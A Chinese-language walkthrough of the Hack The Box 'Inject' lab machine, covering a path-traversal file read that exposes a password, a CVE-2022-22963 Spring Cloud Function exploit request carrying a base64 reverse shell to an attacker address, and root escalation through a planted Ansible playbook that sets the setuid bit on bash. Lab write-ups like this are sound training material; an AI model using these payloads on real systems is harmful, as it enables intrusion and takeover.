HTB靶场之-inject

这篇具有很好参考价值的文章主要介绍了HTB靶场之-inject。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

准备:

攻击机:虚拟机kali。

靶机:Inject,htb网站:https://www.hackthebox.com/,靶机地址:https://app.hackthebox.com/machines/Inject。

知识点:ansible提权(非漏洞提权)、本地文件包含漏洞、CVE-2022-22963、敏感信息发现。

一:信息收集

1.nmap扫描

使用nmap扫描下端口对应的服务:nmap -T4 -sV -p22,80,8080,3306 -A 10.10.11.204,显示开放了22端口、8080端口,开启了ssh服务、http服务。

HTB靶场之-inject

2.web服务

请求下其8080端口的web服务:http://10.10.11.204:8080/,发现存在文件上传的功能点。进行上传测试时显示只允许上传图片文件。

HTB靶场之-inject

HTB靶场之-inject

二:信息利用

1.文件上传

那就尝试上传一个图片码,win的cmd中copy即可生成,然后将生成的图片码上传到靶机,显示上传成功并可以查看图片信息。

HTB靶场之-inject

2.本地文件包含漏洞

然后就尝试进行命令执行:curl http://10.10.11.204:8080/show_image?img=pass1.jpg?pass=id,意外获得了文件的绝对路径:/var/www/WebApp/src/main/uploads/pass1.jpg。

HTB靶场之-inject

修改下请求的地址,尝试访问下上级目录发现是可以正常访问的。

HTB靶场之-inject

然后就是利用这一直查找,共发现以下信息:

系统账户:frank、phil
#使用ssh登录时,无法直接登录
phil账户的密码信息:DocPhillovestoInject123
#命令:curl http://10.10.11.204:8080/show_image?img=../../../../WebApp/pom.xml
依赖信息:org.springframework.cloud   <version>3.2.2</version>

HTB靶场之-inject

HTB靶场之-inject

HTB靶场之-inject

 三:CVE-2022-22963漏洞

 springframework.cloud版本在3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2时存在一个spel注入漏洞,其编号是cve-2022-22963,该漏洞的利用方式可以在vulhub网站查看:https://vulhub.org/#/environments/spring/CVE-2022-22963/,利用也较为简单。使用bp抓取:http://10.10.11.204:8080的数据包并进行修改。

#抓取的数据包
GET / HTTP/1.1
Host: 10.10.11.204:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

#修改后的数据包
#加密数据为base64加密,内容为:bash -i >& /dev/tcp/10.10.14.86/6688 0>&1
#10.10.14.86为本机新增的一个地址
POST /functionRouter HTTP/1.1
Host: 10.10.11.204:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC44Ni82Njg4IDA+JjE=}|{base64,-d}|{bash,-i}")
Content-Type: text/plain
Content-Length: 8

test

 然后在kali中开启对6688端口的监听,命令:nc -nvlp 6688,然后发送修改后的数据包,成功获得shell权限。

HTB靶场之-inject

 获得shell权限后利用上面发现的phil账户的密码信息:DocPhillovestoInject123切换到phil账户,然后在/home/phil目录下发现user.txt文件,读取该文件成功获得flag值。

HTB靶场之-inject

四:提权

1.信息收集

先是使用sudo -l想查看下是否存在特权命令,未成功,然后想着查找下特权文件,发现了/usr/lib/policykit-1/polkit-agent-helper-1,之前遇到过两个这样的漏洞,经过测试均无法利用。

HTB靶场之-inject

然后就上传了LinEnum.sh和pspy64进行信息收集,在pspy64中发现存在定时任务(不太好找,慢慢看,别急),会删除/opt/automation/tasks目录下的所有文件,然后重新将/root/playbook_1.yml复制到/opt/automation/tasks/playbook_1.yml,然后执行/opt/automation/tasks/下的所有文件。

HTB靶场之-inject

2.ansible

首先看一下playbook_1.yml的内容与格式,并进行简单的说明。

- hosts: localhost
  tasks:
  - name: Checking webapp service
    ansible.builtin.systemd:
      name: webapp
      enabled: yes
      state: started

host部分:使用hosts指示使用哪个主机或者主机组来运行下面的tasks,每个playbooks都必须指定hosts,host也可以使用通配符格式。

tasks:指定远端主机将要执行的一系列动作。tasks的核心为ansible的模块,tasks包含name和要执行的模块,name是可选的,只是为了便于用户阅读,模块是必须的,同时也要给予模块相应的参数。

然后百度下如何执行命令,结果如下:

 HTB靶场之-inject

3.提权 

那我们就按照playbook_1.yml格式,构造一个playbook_2.yml来执行我们需要执行的命令,格式如下:

- hosts: localhost
  tasks:
  - name: getroot
    command: sudo chmod u+s /bin/bash

然后将playbook_2.yml上传到靶机,等待一会执行bash -p后成功获得root权限。

HTB靶场之-inject

获得root权限后在/root目录下发现root.txt文件,读取该文件成功获得flag值。

HTB靶场之-inject文章来源地址https://www.toymoban.com/news/detail-440250.html

到了这里,关于HTB靶场之-inject的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • HTB靶机011-Node-WP

    10.10.10.58 上来端口扫描,masscan扫全端口,nmap快速扫前100端口 盲猜一手80端口,猜错了,nmap扫描结果出来了,3000端口存在HTTP服务 接下去看下这个http服务,同时后台不能停,在用nmap扫一遍全端口。(因为网络问题,查漏补缺,避免错过信息。) 扫描结果只开放了这两个端口

    2024年02月05日
    浏览(33)
  • HTB靶机014-Sunday-WP

    靶机IP:10.10.10.76 Nmap 快速扫描: 全端口扫描: 对开放的端口使用脚本扫描 -sC 脚本扫描并没有给出实质性的帮助。 搜索nmap脚本库finger相关的脚本,只有一个,输出结果和上面一样,没什么帮助。 在脚本扫描的同时,通过telnet进行了端口探测: 应该是finger服务,搜索相关资

    2024年02月05日
    浏览(29)
  • HTB靶机013-Poison-WP

    靶机IP: 10.10.10.84 Nmap 快速扫描: Nmap 全端口扫描,结果也是一样。 80端口Web服务访问如图: 翻译: 用于测试本地 .php 脚本的临时网站。 待测站点:ini.php、info.php、listfiles.php、phpinfo.php 试下输入phpinfo.php,结果如图: 文件包含 这个链接形式 http://10.10.10.84/browse.php?file=phpin

    2024年02月05日
    浏览(43)
  • HTB靶场 Shared

    靶场地址:Hack The Box 进入靶场地址之后,先连接靶场网络 点击右上角连接按钮 弹出窗口,选择第一个免费的选项SG FREE1 然后选择第一个选项 默认选项点击下载,将连接配置文件下载下来 之后在kali上命令行内使用命令直接连接 看到complete,还有刷新hackthebox也页面发现已经在

    2024年02月01日
    浏览(49)
  • HTB (hackthebox)Coder Insane靶机 User Flag WriteUp

    Coder

    2024年02月03日
    浏览(37)
  • HTB-oopsie靶场练习

    靶机地址: 10.129.130.57 攻击机地址: 10.10.14.185 端口扫描 访问10.129.130.57, 对一些可能有用的信息进行记录 打开 burp , 刷新网页, 点击 HTTP history ,注意到/cdn-cgi/login/script.js 试着访问http://10.129.130.57/cdn-cgi/login/script.js,页面没有内容 访问http://10.129.130.57/cdn-cgi/login/,发现登录后台

    2024年02月09日
    浏览(37)
  • [渗透测试学习靶机07] vulnhub靶场 Prime 2

    Kali的IP地址:192.168.127.139 靶机的IP地址:192.168.127.145 目录 一、信息搜集 二、漏洞挖掘 三、漏洞利用 四、提权 总结: Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。 1.1、扫描主机IP 1.2、扫描端口 发现开放了

    2024年02月05日
    浏览(48)
  • 实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1

    写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) netdiscover扫描目的IP 发现开放端口为22和3000 访问3000 3000端口是node 对node.js稍有了解的都知道 3000是node.js的默认端口,简

    2024年02月13日
    浏览(32)
  • web靶场——xss-labs靶机平台的搭建和代码审计

    目录 一、web靶场-xss-labs靶机平台的搭建 1、将下载好的压缩包放置php的WWW根目录下 2、配置网站 3、启动MYSQL和Nginx 4、完成后我们就可以在浏览器输入127.0.0.1:8088进入靶场 二、xss-labs靶场通关攻略 第一关: 1、输入代码进行测试:源代码 我们直接将参数插入标题试一试 第二关

    2024年02月04日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包